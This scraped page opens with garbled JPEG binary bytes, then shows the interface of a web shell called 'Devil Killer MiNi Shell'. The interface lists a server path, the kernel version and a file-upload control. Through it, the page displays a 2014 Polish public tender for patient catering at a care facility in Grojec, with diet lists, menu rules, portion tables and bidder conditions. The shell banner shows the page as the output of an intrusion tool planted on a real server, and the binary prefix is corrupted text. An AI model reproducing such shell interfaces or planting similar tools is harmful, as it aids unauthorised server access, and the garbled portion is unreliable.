JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140903/293104-N-2014.html

<p class="kh_header"><b>Grojec: całodobowe żywienie pacjentów PZOL w Grojcu</b><br>
<b>Numer ogłoszenia: 293104 - 2014; data zamieszczenia: 03.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Zakłady Opiekuńczo-Lecznicze w Grojcu , Aleja Ogrodowa 1, 32-615 Grojec, woj. małopolskie, tel. 33 8428136, faks 33 8428903.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzol.cba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> całodobowe żywienie pacjentów PZOL w Grojcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis  przedmiotu zamówienia
 na usługę pn. całodobowe żywienie pacjentów PZOL w Grojcu
Przedmiotem zamówienia jest świadczenie usług w zakresie: przygotowania i dostawy całodziennych posiłków dla pacjentów PZOL w Grojcu Al.Ogrodowa 1
oraz odbioru odpadów pokonsumcyjnych.
Zakład posiada dwa oddziały: psychiatryczny i ogólny z podziałem na:
Oddział Psychiatryczny - II
Oddział Ogólny              - I,III 
Średnia miesięczna ilość osobodni żywienia wynosi 340 przygotowywanych
 posiłków, uwzględniając dodatki w diecie cukrzycowej i innych.
osobodzień-stawka dzienna żywienia rozumiana jako 3 posiłki dziennie we wszystkich dietach i 5 posiłków w diecie cukrzycowej, wysokokalorycznej, wysokobiałkowej
Posiłki dla pacjentów winny być dostarczane codziennie  o  ściśle ustalonych godzinach
- śniadanie - godzina 7.00
- obiad       -  godzina 11.00
- kolacja    -  godzina 16.00
Za każde opóźnienie w dostarczeniu posiłków Wykonawca zapłaci kary umowne zawarte w umowie.
  
Przygotowanie posiłków odbywać się będzie z uwzględnieniem diet stosowanych
w tutejszym Zakładzie oraz zgodnie z zaleceniem lekarza. Żywienie pacjentów
w PZOL w Grojcu opiera się na niżej wymienionych dietach :

1.Dieta Podstawowa
- podstawowa mielona 
- podstawowa redukcyjna 
- podstawowa redukcyjna mielona 
- podstawowa redukcyjna 
- podstawowa redukcyjna mielona 
- podstawowa wysokokaloryczna - 5 posiłków
- podstawowa wysokokaloryczna mielona - 5 posiłków
- podstawowa z ograniczeniem soli
- podstawowa z ograniczeniem fosforu
- podstawowa z ograniczeniem potasu
2.Dieta Wątrobowa
- wątrobowa mielona
- wątrobowa bez mleka i produktów mlecznych
- wątrobowa bez mleka i produktów mlecznych mielona
- wątrobowa redukcyjna
3.Dieta żołądkowa
- żołądkowa mielona
4.Dieta Łatwostrawna
- łatwostrawna mielona
5.Dieta Cukrzycowa - 5 posiłków
- cukrzycowa mielona - 5 posiłków
- cukrzycowa bez mleka, jarzyny, owoce gotowane- 5 posiłków
6.Dieta Wysokobiałkowa zawierająca 100-120g białka- 5 posiłków
7.Dieta Niskobiałkowa zawierająca do 40 g białka
8.Dieta Kleikowa
9.Diety indywidualne na zlecenie lekarza
10.Dieta niskotłuszczowa
11.Dieta z wykluczeniem produktów zawierających cholesterol
12.Dieta wysokokaloryczna.
13.Dieta bezglutenowa
Diety mogą ulec zmianie w zależności od stanu zdrowia pacjentów i zlecenia 
lekarza.

Zamawiający zastrzega sobie prawo niezrealizowania całości zamówienia, jeżeli
jego indywidualne potrzeby będą mniejsze od przewidywanych.       

Wykonawca będzie przygotowywać posiłki w oparciu o system HACCP zgodnie z ustawą z 25.08.2006  o bezpieczeństwie żywności i żywienia - Dz.U z 2010r 
Nr 136 poz.914 z późniejszymi zmianami.

Wykonawca będzie zobowiązany do sporządzenia dziennych jadłospisów w formie 
tzw.dekadówki 10-dniowy jadłospis dla wszystkich diet obowiązujących u Zamawiającego, z podaniem gramatury potraw. Jadłospis winien być przedstawiony do akceptacji osobie wyznaczonej przez Zamawiającego z 7-dniowym wyprzedzeniem. Zamawiający ma 3 dni na akceptację i wniesienie uwag do jadłospisu  Jeżeli jadłospis nie zostanie zaakceptowany przez  Zamawiającego,
Wykonawca w terminie 2-dniowym ma obowiązek dostarczyć nowy jadłospis do akceptacji.
Jadłospis dekadowy/po akceptacji/ dostarczony będzie w 5 - kopiach.
Jadłospisy dekadowe nie mogą się powtarzać.
Jadłospis dekadowy winien zawierać wagę każdej potrawy.
Jadłospis dekadowy musi być sporządzony zgodnie z artykułem 17 Rozporządzenia Ministra Rolnictwa i  Rozwoju Wsi z 10 lipca 2007r w sprawie znakowania środków spożywczych -Dz.U.Nr 137 poz 966 z późniejszymi zmianami. 
Każdy miesiąc składa się z 3 dekad
1.  I dekada  - 1 -10 
2. II dekada - 11-20
3.III dekada - 21-28 luty
                       21-30 marzec, kwiecień, czerwiec, wrzesień, listopad
                       21-31 styczeń, maj, lipiec, sierpień, październik, grudzień
W dniu rozpoczęcia umowy  II dekada 14-20 październik 2014r.
Wykonawca zobowiązany jest do codziennego dostarczania w formie pisemnej 
dziennego jadłospisu z wyszczególnieniem diet oraz nanoszeniem aktualnych poprawek.
Dieta podstawowa i cukrzycowa winna zawierać: rodzaj, ilość  i wagę użytych produktów do produkcji, ich wartość energetyczną i odżywczą. 
Wykonawca będzie przygotowywać posiłki tradycyjne w okresie świąt Bożego Narodzenia, Wielkanocy oraz na okazyjne uroczystości - 10 x w trakcie trwania umowy wskazane przez Zamawiającego. Posiłki te muszą się różnic od posiłków 
w dni świąteczne tj niedziela. Zamawiający w tym wypadku ma prawo przedstawić swoje propozycje odnośnie menu.W okresie świąt Bożego Narodzenia 
i Wielkanocy ,pacjenci otrzymają do 1-go posiłku dodatkowo ciasto własnego wypieku. 
Zamawianie ilości oraz rodzajów diet posiłków będzie się odbywało przez pracownika  tutejszego zakładu z wyprzedzeniem 1 -dniowym do godziny 13.00 
z możliwością korekty zamówienia w dniu dostawy: do godziny 6.10 korekta śniadania, do godziny 10.00 korekta obiadu, do godziny 15.00 korekta kolacji.
Dostarczanie posiłków winno odbywać się w odpowiednio przeznaczonych do tego celu pojemnikach termoizolacyjnych z atestem, wykonanych z tworzywa zabezpieczającego posiłki przed wylaniem i schłodzeniem:
termosy jednoskładnikowe przeznaczone do transportu gorących posiłków -zup,
termosy wieloskładnikowe wypełnione pojemnikami, które występują w różnej
konfiguracji, zapewnią dostarczanie na oddziały /Psychiatryczny -II, Ogólny I, III, poszczególnych zamówionych posiłków-diet. Każdy pojemnik powinien być
opisany- ilość i rodzaj diety.
Napoje :herbata, kawa kompot, kakao będą dostarczane w szczelnych termosach z
kranikiem.Należy zapewnić wymagany standard Sanitarno-Epidemiologiczny.
Właścicielem niezbędnej ilości termosów jest Wykonawca.
Dbanie o czystość termosów/mycie po każdym dostarczonym posiłku i dezynfekcja należy do Wykonawcy. 
Posiłki muszą się charakteryzować wysoką jakością ,posiadać właściwe walory smakowe i estetyczne oraz właściwą temperaturę nie niższą niż:
zupa - temperatura  75°C
II danie- temperatura 63° C
gorące napoje - temperatura  80° C
dania zimne- sery, wędliny, sałatki itp. - 4°C 
Wykonawca zobowiązuje się do odbioru odpadów pokonsumpcyjnych. Odbiór następuje po każdym posiłku. Koszt transportu odpadów pokonsumpcyjnych ponosi Wykonawca. Pojemniki na odpady dostarcza Wykonawca. Odpowiada  on również za ich stan sanitarny.
Wykonawca zobowiązany jest do pobierania i przechowywania oznakowanych próbek pokarmowych stosownie do Rozporządzenia Ministra Zdrowia z dnia 17 kwietnia 2007r w sprawie pobierania i przechowywania próbek żywności przez zakłady żywienia zbiorowego typu zamkniętego /Dz.U. Nr 80 poz. 545.
Zamawiający wyklucza użycia do przygotowania posiłków gotowych potraw
półproduktów, mrożonych pierogów ,klusek, pulpetów.Wyklucza się możliwość
przygotowania potraw z proszku i mrożonych produktów.
Jadłospis winien uwzględnić:
- zupę mleczną -250 ml zawierającą 250 ml mleka o zawartości tłuszczu 2,50- 3%
- mieszane pieczywo krojone
- bułki pszenne, razowe
- różnorodne wędliny z podaniem w jadłospisie rodzaju wędliny w dekadzie nie może się powtarzać ten sam gatunek wędliny i następujących po sobie dekadach
- do śniadań ,obiadów i kolacji dodatek sezonowych warzyw i owoców
- pasty jako dodatek do śniadania, kolacji  z podaniem składników i gramatury poszczególnych składników w dekadzie 4 razy 2 x śniadanie,2x kolacja w następujących po siebie dekadach nie mogą się powtarzać
- sery twarogowe, topione, żółte
- parówki drobiowe
- pasztetowa lub pasztet, salceson 1 x w miesiącu
- dżem, miód, krem czekoladowy  1 x w dekadzie jeden z tych wymienionych produktów jako śniadanie lub kolacja lub obiad  
- jajka, jajecznica
- galaretka drobiowa
- sałatki jarzynowe  co najmniej 4 x w dekadzie 2 x śniadanie,2 x kolacja własnej    produkcji nie powtarzające się w dekadach  z podaną gramaturą wszystkich składników.
- różnorodne potrawy mięsne z podaniem w jadłospisie z jakiego mięsa jest przyrządzona potrawa - z wykluczeniem fasolki po bretońsku, makaronu, ryżu z sosem mięsnym mięsem mielonym-preferowane mięso w całości postaci sztuki mięsa, fileta, udka, roladki, pieczeni, kotleta - co najmniej 5 x w  dekadzie. Dopuszczalne 1 x w dekadzie mięso mielone w postaci kotletów mielonych, gołąbków z mięsem, pulpetów. Dotyczy to również diety mielonej potrawy z mięsa gotowanego w całości, mielonego na miejscu u Wykonawcy
- gulasz mięsny dopuszczalny 1 x w miesiącu
- gulasz z podrobów 1 x w miesiącu
- wątróbka jako  śniadanie lub kolacja  lub II danie  1 x w miesiącu
- kaszanka jako śniadanie, kolacja, II danie wykluczona
- zróżnicowane potrawy mączne kluski, naleśniki, makarony, pierogi -własny wyrób
- placki ziemniaczane nie z proszku, mrożonek przynajmniej raz w miesiącu
- pierogi różny rodzaj  2 razy w dekadzie  własny wyrób z wykluczeniem mrożonych
- naleśniki  1 raz w dekadzie  różny rodzaj farszu w 2 -kolejnych dekadach farsz nie może się powtarzać
- łazanki 2 x w miesiącu
- makaron z serem i innymi dodatkami 1 x w miesiącu
- ryż z owocami i innymi dodatkami 1 x w miesiącu
- makaron jako dodatek do zupy - w dekadzie nie może się powtórzyć ten sam gatunek makaronu
- potrawy z ryb z wykluczeniem paluszków rybnych zalecane 1 raz w dekadzie
do drugiego dania obiadowego
- kasza, ryż, makaron jako dodatek do II dania nie częściej niż 2 razy w miesiącu 
- zróżnicowane napoje na bazie mleka :
- kakao- 300 ml - 300 ml mleka o zawartości  2,50- 3 % tłuszczu
- kawa zbożowa 300 ml mleko 250 ml o zawartości 2,50- 3% tłuszczu  
- herbata jako napój o odpowiednim smaku i kolorze. 
- kompot z owoców, niedopuszczalna woda z sokiem.`
Dodatki do posiłków powinny być porcjowane.
Przynajmniej raz w miesiącu ciasto własnego wypieku, pieczone w kuchni Wykonawcy z wykluczeniem ciast z proszku
W zupach zawartość jarzyn nie może być mniejsza niż 100g w 1 porcji,  zabielane śmietaną nie mąką.
Wymagane normy gramowe wyżywienia określa załącznik nr 1 do Szczegółowego
opisu przedmiotu zamówienia.
Do przygotowywania potraw należy używać produktów wysokiej jakości i zawsze świeżych.
Wykonawca dostarcza na oddziały w razie zgłoszenia dodatki : cukier, herbata, suchary  w ramach obowiązującej stawki żywieniowej.
Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu przeprowadzenia kontroli poprawności realizacji postanowień umowy, udostępnić Zamawiającemu niezbędne dokumenty  wartości odżywcze potraw, ilość i rodzaj produktów zużytych do ich przygotowania, dokumenty z kontroli sanepidu i innych, oceny stanu sanitarnego kuchni i pomieszczeń sanitarnych, jadłospisów dokonanej przez Sanepid.
W przypadku zakwestionowania wymagań dotyczących realizacji umowy, w tym przygotowywanych posiłków Wykonawca jest zobowiązany do ich wymiany w ciągu 40 minut od chwili zgłoszenia.
W przypadku nie uznania zgłoszonej  reklamacji Zamawiający zastrzega sobie prawo wezwania Wykonawcy w celu dokonania wspólnej oceny zasadności reklamacji.
Osobami upoważnionymi ze strony Zamawiającego jest Zespół Kontroli
Żywienia -ZKŻ na czele którego stoi dietetyk.
Wymienieni wyżej pracownicy uprawnieni są zarówno do wstępnej kontroli organoleptycznej jak i do degustacji posiłków przed ich wydaniem. Odpowiednia adnotacja poczyniona zostanie w zeszycie z zaznaczeniem dnia i godziny oceny.
Za uchybienia ujawnione w trakcie kontroli np. Sanepidu wynikające ze świadczonej przez Wykonawcę usługi, której następstwem będą m.in. mandaty, kary odpowiada Wykonawca.
Wykonawca zapewnia na własny koszt i we własnym zakresie ciągłość żywienia w przypadku awarii urządzeń bądź wystąpienia innych okoliczności uniemożliwiających przygotowanie posiłków. Wykonawca w tej sytuacji zobowiązany jest do natychmiastowego powiadomienia o tym Zamawiającego.
Wykonawca jest zobowiązany do bieżącego informowania  Zamawiającego o poczynionych działaniach w ramach zapewnienia ciągłości żywienia. Jednocześnie w wypadku o którym mowa jak wyżej w mocy pozostają wszelkie postanowienia 
umowy, zwłaszcza w zakresie reżimu sanitarnego.
Upoważniony pracownik Zamawiającego ma prawo do przeprowadzenia dochodzenia epidemiologicznego obejmującego proces produkcji i transport posiłków w przypadku podejrzenia zatrucia pokarmowego.  
Faktura będzie wystawiona na podstawie rejestru osobodni żywienia prowadzonych i dostarczonych do 3 -go dnia po zakończeniu miesiąca przez Zamawiającego, za faktyczną ilość otrzymanych i wydanych śniadań, obiadów i kolacji.
                                                                                              











































                                                                                                                                                                                             
                                                                                                  
WYMAGANA MINIMALNA GRAMATURA PRODUKTÓW I POTRAW GOTOWANYCH
(NA TALERZU) Na 1 posiłek

L.P.	RODZAJ PRODUKTU/ POTRAWY	GRAMATURA

	
	Śniadanie	kolacja
1	Pieczywo mieszane	100g	50g
2	Bułka kajzerka 1 szt. a 50g lub wek	50g	-
3	Cukier do kawy zbożowej/herbaty	20 g	20g
4	Kawa zbożowa z mlekiem/kakao	300 ml	250 ml
5	Herbata	300 ml	250
6	Zupa mleczna	250 ml	
7	Masło 82% tłuszczu	20g	20g
8	Wędlina krojona	50g
9	Parówka na gorąco	100g
10	Pasty do pieczywa	80g
11	Twarożek	80g
12	Jajecznica	100g
13	Ser żółty krojony	50g
14	Ser topiony	50g
15	Dżem	50g
16	Miód	40g
17	Krem czekoladowy	40g
18	Wędlina podrobowa	50g
19	Jajko	1 szt.
20	Galaretka drobiowa	100g
21	Sałatka jarzynowa	150g
22	Dodatki w postaci jarzyn	100g
23	Sałata zielona	20 g
24	Pomidor	1 szt.
II.        Posiłek obiadowy
1	Zupa	450 ml
2	Ziemniaki	250g
3	Kluski śląskie, kopytka	200g
4	Makaron do zup	50g
5	Sosy	80g
6	Dodatki warzywne do II dania np.    surówki,    marchewka    z groszkiem,   buraczki,   kapusta biała        duszona,        jarzyny gotowane	15Og
7	Sałata zielona,mizeria            ze śmietaną/sosem vinegrette	150-mizeia
 50- sałata zielona
+ dodatki
8	Udko z kurczaka	1 szt.
9	Potrawka z kurczaka	180g, mięso 
10	Filet z kurczaka	80g
11	Zrazy zawijane	80g
12	Sztuka mięsa	80g
13	Kotlet mielony	lOOg
14	Pieczeń wieprzowa 	80g
15	Kotlet schabowy	80g
17	Gulasz wieprzowy, wołowy	80g: mięso 

18	Bitki 	80g,
19	Klopsiki, pulpet	80g
20	Ryba w jarzynach	80g ryba, jarzyny - 50g
21	Filet z ryby smażony	100g
22	Bigos	400g
23	Łazanki z kapustą i mięsem	300g
24	Pyzy z mięsem	200g
25	Kotlet z jaj	80g
26	Gołąbki z mięsem i ryżem / sos	250g/ lOOg
27	Naleśniki z serem,kapustą	250g
28	Naleśniki z dżemem,mięsem	150g
29	Placki ziemniaczane	300g
30	Makaron z serem białym	200g
31	Makaron do II dania	200g
32	Makaron z serem	300g
33	Ryż z jabłkami	300g
34	Ryż na sypko	150g
35	Pierogi z mięsem,owocami, ruskie  z serem i iinne	300g
36	Kasza na sypko	200g
37	Kompot	300 ml.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje skorzystanie z prawa do udzielania z wolnej ręki zamówienia uzupełniającego na podstawie art.67 ust.1 pkt 6 ustawy PZP do 20% wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy usługi.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 6000 złotych

2.Wadium wnosi się przed upływem terminu składania ofert.

3.Wadium może być wniesione w jednej lub kilku następujących formach:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-gwarancjach bankowych;
-gwarancjach ubezpieczeniowych;
-poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości -Dz.U. z 2007r Nr 42, poz.275.

4.Wadium wnoszone w pieniądzu wpłacić należy przelewem na rachunek bankowy: 
ING Bank Śląski nr 74 1050 1445 1000 0090 3022 6808 

5.Potwierdzenie wpłacenia lub wadium w innej formie niż pieniądz należy złożyć w formie uwierzytelnionej kserokopii w osobnej kopercie z napisem -Potwierdzenie wpłaty wadium
wraz z ofertą w dziale księgowości pokój nr 3 w PZOL w Grojcu, Al.Ogrodowa 1. lub załączyć do oferty, jako integralną część.

6.Wadium zostanie zwrócone zgodnie art.46 ustawy PZP.

7.Zamawiający zatrzymuje wadium, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3 ustawy Pzp  nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.

8. Zamawiający zatrzymuje wadium , jeżeli wykonawca, którego oferta została wybrana:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek za spełniony na podstawie złożonego zezwolenia/decyzji/opinii właściwego organu inspekcji sanitarnej uprawniającą Wykonawcę do prowadzenia działalności cateringowej (przynajmniej jedną kuchnią posiadającą decyzję Państwowej Inspekcji Sanitarnej zatwierdzającą zakład do produkcji posiłków i ich wywozu do odbiorców zewnętrznych. Kuchnia musi być w dyspozycji wykonawcy na okres nie krótszy niż planowany termin wykonywania niniejszego zamówienia, tj.24 miesięcy od dnia podpisania umowy. Ocena wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać kolejno wszystkie usługi cateringowe żywienia  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, świadczył lub świadczy  usługi  wraz z podaniem ich wartości,  dat wykonania i podmiotów, na rzecz, których  usługi zostały wykonane lub są wykonywane, oraz załączy dowody, że usługi zostały wykonane lub są wykonywane należycie jak również nie nienależycie- z wykorzystaniem wzoru stanowiącego załącznik nr 3 do SIWZ.Ocena wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek, jeżeli wykaże, że dysponuje, co najmniej jednym samochodem posiadającym decyzję/opinię Państwowego Inspektora Sanitarnego, potwierdzającą dopuszczenie go do przewozu posiłków.Ocena wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w  tym zakresie, uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy PZP- załącznik nr 4 do SIWZ.Ocena wg reguły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowego warunku w  tym zakresie , uzna warunek za spełniony na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu zawartych w art. 22 ust. 1 ustawy PZP- załącznik nr 4 do SIWZ.Ocena wg reguły spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

